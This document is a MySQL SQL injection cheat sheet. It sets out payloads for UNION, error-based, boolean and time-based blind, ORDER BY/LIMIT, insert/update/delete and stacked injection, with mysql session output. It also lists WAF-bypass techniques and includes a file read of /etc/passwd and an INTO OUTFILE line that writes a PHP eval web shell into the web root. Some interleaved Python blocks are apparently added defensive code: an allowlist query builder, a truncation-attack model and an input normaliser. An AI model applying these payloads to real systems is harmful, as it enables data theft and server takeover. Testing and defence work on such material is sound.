Common basic information

Database name: database()
Database version: version()
Current user: user()
Operating system: @@version_compile_os
Database data path: @@datadir
MySQL install path: @@basedir

UNION injection

Guessing the number of columns

order by num

num is a number, starting at 1 and increased by one each time; if 1, 2, 3 and 4 return normally and 5 returns an error, the column count is 4.

Exposing the displayed columns

If there are 4 columns:

id=-1 union select 1,2,3,4

The id value is set to 0 or a negative number so that the original query returns no row.

Extracting content

For example:

id=-1 union select 1,user(),database(),4

Any displayed column position can be used to run a query.

Comma-filter bypass (using join)

id=-1 union select 1,2,3,4
id=-1 union select * from (select 1)a join (select 2)b join (select 3)c join(select 4)d

Error-based injection

updatexml (length limit: at most 32 characters)

id=1 and updatexml(1,concat(0x7e,user(),0x7e),1)

If concat is filtered, use make_set instead

id=1 and updatexml(1,make_set(3,0x7e,user()),1)

ExtractValue (length limit: at most 32 characters)

id=1 and extractvalue(1,concat(0x7e,user(),0x7e))

If concat is filtered, use make_set instead

exp (MySQL 5.5.5 and above)

id=1 and (select exp(~(select * from(select user())x)))

floor

id=1 OR (SELECT 8627 FROM(SELECT COUNT(*),CONCAT(0x70307e,(SELECT user()),0x7e7030,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

polygon

id =1 AND polygon((select * from(select * from(select user())a)b))

GeometryCollection

id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))

multipoint

id = 1 AND multipoint((select * from(select * from(select user())a)b))

multilinestring

id = 1 AND multilinestring((select * from(select * from(select user())a)b))

linestring

id = 1 AND LINESTRING((select * from(select * from(select user())a)b))

multipolygon

id =1 AND multipolygon((select * from(select * from(select user())a)b))

Reading and writing files

Reading a file

select load_file('/etc/passwd')

Writing a file

select '<?php @eval($_POST[123]);?>' into outfile '/var/www/html/1.php'

Time-based blind injection

sleep

mysql> select sleep(5);
+----------+
| sleep(5) |
+----------+
|        0 |
+----------+
1 row in set (5.00 sec)

benchmark

mysql> select benchmark(10000000,sha(1));
+----------------------------+
| benchmark(10000000,sha(1)) |
+----------------------------+
|                          0 |
+----------------------------+
1 row in set (2.79 sec)

Cartesian product

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+------------+
| count(*)   |
+------------+
| 2651020120 |
+------------+
1 row in set (1 min 51.05 sec)

get_lock

The delay is precisely controllable, but the usable environments are limited (a persistent connection is required; in an Apache+PHP setup the mysql_pconnect function must be used to connect to the database), and two sessions are needed to test it.
SESSION A

mysql> select get_lock('test',1);
+--------------------+
| get_lock('test',1) |
+--------------------+
|                  1 |
+--------------------+
1 row in set (0.00 sec)

SESSION B

mysql> select get_lock('test',5);
+--------------------+
| get_lock('test',5) |
+--------------------+
|                  0 |
+--------------------+
1 row in set (5.00 sec)

rlike

Build a long string with rpad or repeat and pair it with a computationally expensive pattern; the length of the delay is controlled through the repeat argument.

mysql> select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
+-------------------------------------------------------------+
| rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b') |
+-------------------------------------------------------------+
|                                                           0 |
+-------------------------------------------------------------+
1 row in set (5.27 sec)

Nondeterministic regex

select if(substr((select 1)='1',1,1),concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',1);

Boolean-based blind injection

The logical comparison functions are basically these:

left(user(),1)>'r'
right(user(),1)>'r'
substr(user(),1,1)='r'
mid(user(),1,1)='r'
greatest("sed",database())= "sed" // returns the larger value, then compares it with the string
select least("sea",database())="sea"; // returns the smaller value, then compares it with the string

// without commas
user() regexp '^[a-z]'
user() like 'root%' // note the _ and % wildcards; when scripting, put them at the end of the character set
POSITION('root' in user())
mid(user() from 1 for 1)='r'
mid(user() from 1)='r'

ASCII(), ORD() and CHAR() are generally used as helper functions.

Injection after ORDER BY

Error-based injection

and extractvalue(1, concat(0x7e, (select @@version),0x7e))

Boolean-based and time-based blind injection

order by if()

Injection after LIMIT

Without an ORDER BY keyword

mysql> select id from users limit 0,1 union select user();
+----------------+
| id             |
+----------------+
| 1              |
| root@localhost |
+----------------+
2 rows in set (0.00 sec)

With an ORDER BY keyword

This produces an error:

mysql> select id from users order by id desc limit 0,1 union select user();
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY

For 5.0.0 < MySQL < 5.6.6, procedure and into can be used, but writing a file with INTO requires knowing the absolute path and having permission to write a shell, so it is harder to exploit; procedure is considered here.

Error-based injection

mysql> select * from users where id>1 order by id limit 1,1 procedure analyse(extractvalue(1,concat(0x7e,user(),0x7e)),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

Time-based injection

mysql> select * from users where id>1 order by id limit 1,1 procedure analyse(extractvalue(1,concat(0x7e,if((length(database())=8),(benchmark(1000000,sha(1))),1),0x7e)),1);
ERROR 1105 (HY000): XPATH syntax error: '~0~'
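Mitigation for the ORDER BY and LIMIT positions covered in the two sections above, as an added example rather than the page's own code: the sort column and direction cannot be bind parameters, so they are taken from an allowlist, and the LIMIT values are accepted only as plain integers. The users table and its column names are assumed.

```python
# Added example, not the page's code: allowlist-based construction of the
# ORDER BY and LIMIT parts of a query. Table and column names are assumed.
import re

ALLOWED_SORT_COLUMNS = {"id", "username", "created_at"}  # assumed schema
ALLOWED_DIRECTIONS = {"ASC", "DESC"}
MAX_PAGE_SIZE = 100

class UnsafeSortError(ValueError):
    """Raised when a sort or paging parameter is not on the allowlist."""

def _parse_int(value, lo, hi):
    # Only a plain decimal integer is accepted: no sign, no whitespace and no
    # trailing text such as "1,1 procedure analyse(...)".
    if not isinstance(value, str) or not re.fullmatch(r"[0-9]{1,9}", value):
        raise UnsafeSortError(f"not an integer: {value!r}")
    n = int(value)
    if not lo <= n <= hi:
        raise UnsafeSortError(f"out of range: {n}")
    return n

def build_user_query(sort_by="id", direction="ASC", offset="0", limit="20"):
    """Return (sql, params). The WHERE value is a bind parameter; the ORDER BY
    and LIMIT parts come only from allowlisted or integer-validated values."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise UnsafeSortError(f"column not allowed: {sort_by!r}")
    direction = str(direction).upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise UnsafeSortError(f"direction not allowed: {direction!r}")
    off = _parse_int(offset, 0, 10**9)
    lim = _parse_int(limit, 1, MAX_PAGE_SIZE)
    sql = (f"SELECT id, username FROM users WHERE id > %s "
           f"ORDER BY `{sort_by}` {direction} LIMIT {off},{lim}")
    return sql, (1,)
```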

Insert, Update and Delete injection

insert, update and delete generally use error-based injection; in a white-box setting, quote-closing injection can also be used.

mysql> insert into users values(1,'test' and extractvalue(1,concat(0x7e,user(),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
mysql> update users set username='test' where id=1 and extractvalue(1,concat(0x7e,user(),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
mysql> delete from users where id=1 and extractvalue(1,concat(0x7e,user(),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

If there is no error output, time-based injection can be used.

mysql> insert into users values(1,'test','test' or (if((length(database())=8),sleep(5),1)));
ERROR 1062 (23000): Duplicate entry '1' for key 'PRIMARY'
mysql> update users set username='test' where id=1 and if((length(database())=8),sleep(5),1);
Query OK, 0 rows affected (5.00 sec)
Rows matched: 0  Changed: 0  Warnings: 0
mysql> delete from users where id=1 and if((length(database())=8),sleep(5),1);
Query OK, 0 rows affected (5.00 sec)

Stacked-query injection

mysql> select * from users where id=1;select user();
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

MySQL constraint attack

When SQL processes strings, trailing spaces at the end of a string are dropped. In other words, "vampire" is equivalent to "vampire ", which holds in the vast majority of cases (such as strings in a WHERE clause or in an INSERT statement).
When a value inserted into a column exceeds the column's defined length, MySQL truncates it automatically.

mysql>  create table user(id int primary key,user varchar(10),pwd varchar(20));
Query OK, 0 rows affected (0.38 sec)

mysql> insert into user value(1,'admin','123');
Query OK, 1 row affected (0.00 sec)

mysql> insert into user value(2,'admin          ','456');
Query OK, 1 row affected, 1 warning (0.00 sec)

mysql> select * from user;
+----+------------+------+
| id | user       | pwd  |
+----+------------+------+
|  2 | admin      | 456  |
|  1 | admin      | 123  |
+----+------------+------+
2 rows in set (0.00 sec)

mysql> select length(user) from user;
+--------------+
| length(user) |
+--------------+
|           10 |
|            5 |
+--------------+
2 rows in set (0.00 sec)

The lengths differ, but in affected versions, when the id=2 user admin logs in at the front end, the back-end check treats admin as equivalent to the id=1 user admin.
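An added illustration, not part of the original page: a small in-memory model of the two MySQL behaviours just described (non-strict truncation on INSERT and trailing spaces ignored in comparison) showing why the second admin row logs in as the first one, beside a registration check and a UNIQUE index that stop it. The user VARCHAR(10) column matches the page's CREATE TABLE; the function names are assumed.

```python
# Added model, not MySQL itself: user VARCHAR(10) follows the page's table.
USER_COLUMN_LEN = 10

def mysql_store(value, length=USER_COLUMN_LEN):
    """Non-strict INSERT: an over-long value is silently cut to the column length."""
    return value[:length]

def mysql_equal(a, b):
    """PAD SPACE comparison: trailing spaces are ignored, so 'admin' = 'admin     '."""
    return a.rstrip(" ") == b.rstrip(" ")

class UserTable:
    def __init__(self, unique_user=False):
        self.rows = []                   # (user, pwd) in insertion order
        self.unique_user = unique_user   # models a UNIQUE index on the user column

    def insert(self, user, pwd):
        stored = mysql_store(user)
        if self.unique_user and any(mysql_equal(stored, u) for u, _ in self.rows):
            raise ValueError("Duplicate entry for key 'user'")
        self.rows.append((stored, pwd))

    def login(self, user, pwd):
        """SELECT user FROM user WHERE user=? AND pwd=?; returns the matched name."""
        for stored_user, stored_pwd in self.rows:
            if mysql_equal(stored_user, user) and stored_pwd == pwd:
                return stored_user.rstrip(" ")
        return None

def register_hardened(table, user, pwd):
    # Refuse any name the database would alter before storing it; the UNIQUE
    # index is the second layer in case validation is bypassed elsewhere.
    if len(user) > USER_COLUMN_LEN or user != user.strip():
        return False
    try:
        table.insert(user, pwd)
    except ValueError:
        return False
    return True

def demo():
    # Unvalidated inserts exactly as in the page's session, then a login with
    # the second row's password that is accepted as the original admin.
    weak = UserTable()
    weak.insert("admin", "123")
    weak.insert("admin          ", "456")
    strong = UserTable(unique_user=True)
    register_hardened(strong, "admin", "123")
    rejected = not register_hardened(strong, "admin          ", "456")
    return weak.login("admin", "456"), rejected
```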

pow overflow error-based injection

pow(x,y) computes x to the power y; when the result is too large, a DOUBLE overflow occurs and the database raises an error.

mysql> select * from users where id=1 and if((length(database())=8),pow(9,99999999999999),1);
ERROR 1690 (22003): DOUBLE value is out of range in 'pow(9,99999999999999)'
mysql> select * from users where id=1 and if((length(database())=7),pow(9,99999999999999),1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

XOR injection

Used when and, or and union are filtered.
XOR rules:

1^1=0 0^0=0 0^1=1
1^1^1=0 1^1^0=0

Checking whether a keyword is filtered

?id=1' ^ (length('union')=5)--+

If union is filtered, 1^0 gives the output for id=1.
If union is not filtered, 1^1 gives the output for id=0.

Bypass summary

Bypassing an = filter

like or in can be used

Bypassing a filter on the < and > comparison operators

Use greatest or between.
greatest(x,y,z,...) returns the largest of its arguments.

select * from users where id=1 and ascii(substr(database(),1,1))>64

can be rewritten as

select * from users where id=1 and greatest(ascii(substr(database(),1,1)),64)=64
select * from users where id>1 and id<5

can be rewritten as

select * from users where id between 1 and 5

Bypassing a space filter

The following can be used:

1. ()

2. /**/ or /*1*/

3. %0d %0a %0c %0b %a0

4. +

5. TAB

6. double parentheses

7. try encoding any of the above

Bypassing a filter that deletes matches

For example, if the filter deletes /**/ and also filters select, we can write:

sel/**/ect

In other words, a string the filter deletes can be placed inside another string it deletes: the keyword is not recognised, and after the deletion it is restored, which achieves the bypass. Double-writing filtered characters falls under the same method.

Case-variation bypass

UnIon、OrdEr

Inline-comment bypass

/*!union*/+selEct/*!table_name*/

Replacing keywords with symbols

1. && in place of and
2. || in place of or
3. | in place of xor

Bypass with equivalent functions and variables

1. hex(), bin() ==> ascii()

2. sleep() ==> benchmark()

3. concat_ws() ==> group_concat()

4. mid(), substr() ==> substring()

5. @@user ==> user()

6. @@datadir ==> datadir()

7. @@version ==> version()

Encoding bypass

URL encoding, double URL encoding, and ASCII, hex and unicode encoding bypasses.

1. URL encoding: or 1=1 becomes %6f%72%20%31%3d%31

2. Double URL encoding: ?id=1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

3. Hex encoding: see the hex bypass for single quotes

4. ASCII encoding: SELECT * FROM Users WHERE username = CHAR(101, 97, 105, 116)

or

char(101)+char(97)+char(105)+char(116)

5. Unicode encoding:
Some unicode encoding examples:
Single quote:

%u0027 %u02b9 %u02bc
%u02c8 %u2032
%uff07 %c0%27
%c0%a7 %e0%80%a7

Whitespace:

%u0020 %uff00
%c0%20 %c0%a0 %e0%80%a0

Left parenthesis:

%u0028 %uff08
%c0%28 %c0%a8
%e0%80%a8

Right parenthesis:

%u0029 %uff09
%c0%29 %c0%a9
%e0%80%a9

6. HTML entity encoding:

SELECT * FROM Users WHERE username = &#39;admin&#39;

Comma-filter bypass

Use the join bypass described above.

Common bypass forms

1.id=1+(UnIoN)+(SelECT)+

2.id=1+(UnIoN+SeLeCT)+

3.id=1+(UnI)(oN)+(SeL)(EcT)

4. id=1+'UnI''On'+'SeL''ECT'    <- MySQL only

5. id=1+'UnI'||'on'+SeLeCT'    <- MSSQL only

Common comment forms

1. --+

2.#

3.%23

4. -- -

5.%00

6. ` single-line or multi-line comment (alias)

7. // single-line or multi-line comment

Restrictions on the combination with from

from. in place of from
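A detection-side normaliser, added here and not from the original page, that undoes the evasions listed in this bypass summary (double URL encoding, %uXXXX and fullwidth characters, inline /*!...*/ comments, the alternative whitespace bytes, case variation) before keyword matching, so a detector sees roughly what the MySQL lexer will see; the keyword list also carries the time-based and file functions from the earlier sections. The keyword list and function names are assumptions.

```python
# Added example, not the page's code: normalise a request parameter the way
# the MySQL lexer would read it, then look for keywords. Keyword list assumed.
import re
import unicodedata
from urllib.parse import unquote

# Bytes MySQL's lexer treats as whitespace (the page's %09 %0a %0b %0c %0d %a0),
# plus '+' as produced by form encoding.
WHITESPACE = re.compile(r"[\t\n\x0b\x0c\r\xa0 +]+")
KEYWORDS = ("union", "select", "from", "sleep", "benchmark",
            "updatexml", "extractvalue", "load_file", "outfile")

def normalize(raw: str) -> str:
    s = raw
    # %uXXXX is not standard URL encoding; map it to the code point first.
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    # Decode until stable so %252f (double encoding) ends up as '/'.
    for _ in range(3):
        decoded = unquote(s, encoding="latin-1")
        if decoded == s:
            break
        s = decoded
    # NFKC folds fullwidth forms such as U+FF07 back to the ASCII quote.
    s = unicodedata.normalize("NFKC", s)
    # /*!union*/ is executed by MySQL as 'union'; a plain /**/ is a separator.
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = WHITESPACE.sub(" ", s)
    return s.lower().strip()

def find_keywords(raw: str) -> list:
    """Return the SQL keywords present once the input is normalised."""
    s = normalize(raw)
    return [kw for kw in KEYWORDS if re.search(rf"\b{kw}\b", s)]
```

Note that sel/**/ect normalises to "sel ect", which MySQL would not execute either; that trick only works against a filter that deletes tokens and forwards the rewritten input, so inspect a normalised copy and never forward it.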

innodb

In MySQL 5.7 and later, the built-in mysql database gained two statistics tables, innodb_table_stats and innodb_index_stats. If a table uses the InnoDB engine, table and index information is recorded in these two tables.
If the WAF blocks information_schema, these two tables can be used to obtain database and table names.

select * from mysql.innodb_table_stats;
select * from mysql.innodb_index_stats;

sys

MySQL 5.7 added the sys schema, which consolidates various kinds of database information.
The most useful item for us is probably the query column of the statement_analysis view, which records the SQL statements that have been executed (in normalized form) together with some statistics.

select query from sys.statement_analysis;
